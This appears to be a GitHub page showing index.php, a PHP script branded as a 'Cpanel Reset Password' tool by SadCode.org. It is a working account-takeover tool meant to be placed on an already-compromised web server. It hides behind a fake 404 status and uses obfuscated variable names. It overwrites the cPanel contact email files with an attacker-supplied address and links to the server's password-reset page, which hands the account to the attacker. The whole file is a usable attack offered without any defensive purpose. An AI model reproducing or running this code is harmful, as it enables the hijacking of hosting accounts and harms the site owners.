-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathindex.php
More file actions
81 lines (78 loc) · 2.68 KB
/
index.php
File metadata and controls
81 lines (78 loc) · 2.68 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
<?php
error_reporting(0);
header("HTTP/1.0 404 Not Found");
echo '<!DOCTYPE HTML>
<html>
<head>
<title>Cpanel Reset Password</title>
<style type="text/css">
html {
margin: 20px auto;
background: #000000;
color: green;
text-align: center;
}
header {
color: green;
margin: 10px auto;
}
input[type=password] {
width: 250px;
height: 25px;
color: red;
background: transparent;
border: 1px dotted green;
margin-left: 20px;
text-align: center;
}
a {
text-decoration: none;
color: green;
}
</style>
</head>
<center>
<header>
<pre>
$$$$$$\ $$\ $$$$$$\ $$\
$$ __$$\ $$ |$$ __$$\ $$ |
$$ / \__| $$$$$$\ $$$$$$$ |$$ / \__| $$$$$$\ $$$$$$$ | $$$$$$\
\$$$$$$\ \____$$\ $$ __$$ |$$ | $$ __$$\ $$ __$$ |$$ __$$\
\____$$\ $$$$$$$ |$$ / $$ |$$ | $$ / $$ |$$ / $$ |$$$$$$$$ |
$$\ $$ |$$ __$$ |$$ | $$ |$$ | $$\ $$ | $$ |$$ | $$ |$$ ____|
\$$$$$$ |\$$$$$$$ |\$$$$$$$ |\$$$$$$ |\$$$$$$ |\$$$$$$$ |\$$$$$$$\
\______/ \_______| \_______| \______/ \______/ \_______| \_______|
- Cpanel Reset Password - Coded By SadCode.org V.0.1-
</pre>
</header>
</center>
<form action="#" method="post">
<input type="email" name="email" placeholder="Email kalian" />
<input type="submit" name="submit" value="Crack"/>
</form>
<br/><br/><br/>
</p>'; ?>
<?php
$IIIIIIIIIIII = get_current_user();
$IIIIIIIIIII1 = $_SERVER['HTTP_HOST'];
$IIIIIIIIIIlI = getenv('REMOTE_ADDR');
if (isset($_POST['submit'])) { $email = $_POST['email'];
$IIIIIIIIIIl1 = 'email:' . $email; $IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo', 'w'); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I);
$IIIIIIIIII1I = fopen('/home/' . $IIIIIIIIIIII . '/.contactinfo', 'w'); fwrite($IIIIIIIIII1I, $IIIIIIIIIIl1); fclose($IIIIIIIIII1I); $IIIIIIIIIlIl = "https://";
$IIIIIIIIIlI1 = "2083";
$IIIIIIIIIllI = $IIIIIIIIIII1 . ':2083/resetpass?start=1';
$read_named_conf = @file('/home/' . $IIIIIIIIIIII . '/.cpanel/contactinfo');
if(!$read_named_conf)
{
echo "<h1>gak bisa di akses goblok</h1><br><br> </pre></center>";
}
else
{
echo "<center>Ini User Namenya Salin Lalu Gass <br><br></center>";
echo '<center><input type="text" value="' . $IIIIIIIIIIII . '" id="user"> <button onclick="username()">Salin User</button></center> <script>function username() { var copyText = document.getElementById("user"); copyText.select(); document.execCommand("copy"); } </script> ';
echo '<br/><center><a target="_blank" href="' . $IIIIIIIIIlIl . '' . $IIIIIIIIIllI . '">Gass Disini</a><br><br></center>'; ;}} ?>
</div>
</div>
</center>
</body>
</html>